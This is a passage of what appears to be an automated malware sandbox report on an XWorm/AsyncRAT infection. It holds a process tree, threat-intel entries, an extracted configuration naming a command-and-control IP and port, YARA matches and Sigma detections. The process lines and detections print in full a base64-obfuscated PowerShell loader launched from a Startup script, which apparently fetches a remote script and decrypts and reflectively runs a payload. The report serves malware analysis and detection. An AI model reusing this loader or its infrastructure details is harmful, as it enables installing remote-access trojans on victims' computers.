2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkcGd2d2wpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRyZmcgaW4gJGNtdGt0KSB7CWlmICgkcmZnLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSR3bHFpcD0kcmZnLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRla2Nmbj1bc3RyaW5nW11dJHdscWlwLlNwbGl0KCdcJyk7SUVYICckanhpY3M9aWxneWUgKGtkYXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGVrY2ZuWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHVncXJqPWlsZ3llIChrZGF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRla2NmblsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt6Z3d3dyAkanhpY3MgJG51bGw7emd3d3cgJHVncXJqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cmd.exe (PID: 5180 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkcGd2d2wpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRyZmcgaW4gJGNtdGt0KSB7CWlmICgkcmZnLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSR3bHFpcD0kcmZnLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRla2Nmbj1bc3RyaW5nW11dJHdscWlwLlNwbGl0KCdcJyk7SUVYICckanhpY3M9aWxneWUgKGtkYXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGVrY2ZuWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHVncXJqPWlsZ3llIChrZGF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRla2NmblsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt6Z3d3dyAkanhpY3MgJG51bGw7emd3d3cgJHVncXJqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • LogonUI.exe (PID: 1740 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f76055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
    • fontdrvhost.exe (PID: 8044 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 1020 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • LogonUI.exe (PID: 3716 cmdline: "LogonUI.exe" /flags:0x4 /state0:0xa3f5c055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • svchost.exe (PID: 5368 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • fontdrvhost.exe (PID: 6440 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • LogonUI.exe (PID: 6500 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f66055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • LogonUI.exe (PID: 5696 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f7d855 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • fontdrvhost.exe (PID: 7612 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • LogonUI.exe (PID: 4080 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f05055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • fontdrvhost.exe (PID: 2912 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • LogonUI.exe (PID: 6408 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f0c855 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["185.241.208.215"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x33264:$s6: VirtualBox
      • 0x3d4b4:$s6: VirtualBox
      • 0x331c2:$s8: Win32_ComputerSystem
      • 0x3d412:$s8: Win32_ComputerSystem
      • 0x33a8e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x3dcde:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x33b2b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x3dd7b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x33c40:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x3de90:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x33900:$cnc4: POST / HTTP/1.1
      • 0x3db50:$cnc4: POST / HTTP/1.1
      0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 47 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.powershell.exe.1d3133b65d0.8.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            5.2.powershell.exe.1d3133b65d0.8.unpackJoeSecurity_XWormYara detected XWormJoe Security
              5.2.powershell.exe.1d3133b65d0.8.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
              • 0x42ab:$str01: $VB$Local_Port
              • 0x429c:$str02: $VB$Local_Host
              • 0x4580:$str03: get_Jpeg
              • 0x3fdd:$str04: get_ServicePack
              • 0x507c:$str05: Select * from AntivirusProduct
              • 0x527a:$str06: PCRestart
              • 0x528e:$str07: shutdown.exe /f /r /t 0
              • 0x5340:$str08: StopReport
              • 0x5316:$str09: StopDDos
              • 0x540c:$str10: sendPlugin
              • 0x548c:$str11: OfflineKeylogger Not Enabled
              • 0x55e4:$str12: -ExecutionPolicy Bypass -File "
              • 0x570d:$str13: Content-length: 5235
              5.2.powershell.exe.1d3133b65d0.8.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x4f8c:$s6: VirtualBox
              • 0x4eea:$s8: Win32_ComputerSystem
              • 0x57b6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x850c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x5853:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x85c4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x5968:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x86f4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x5628:$cnc4: POST / HTTP/1.1
              18.2.powershell.exe.1e1aa26a4b0.1.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                Click to see the 133 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkcGd2d2wpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0Z